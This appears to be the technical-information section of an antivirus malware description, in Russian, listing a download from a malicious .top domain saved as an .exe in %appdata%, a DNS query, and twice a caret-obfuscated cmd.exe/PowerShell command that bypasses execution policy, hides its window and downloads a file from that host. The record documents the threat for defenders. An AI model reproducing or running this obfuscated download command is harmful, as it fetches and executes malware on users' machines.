Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwE^r^s^HEL^l.E^Xe ^-e^x^e^c^utio^NP^OlIcy By^PASS^ -no^profilE -^WI^ndowS^T^YlE h^idd^En (n^EW-O^b^J^E^C^t ^sYSTe^M.^nET.^WE^b^C^l^IEnT).D^OW^n^lo^Adf^Il^e('http://www.fapoerg...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "POwE^r^s^HEL^l.E^Xe ^-e^x^e^c^utio^NP^OlIcy By^PASS^ -no^profilE -^WI^ndowS^T^YlE h^idd^En (n^EW-O^b^J^E^C^t ^sYSTe^M.^nET.^WE^b^C^l^IEnT).D^OW^n^lo^Adf^Il^e('http://www.fapoerg...' (со скрытым окном)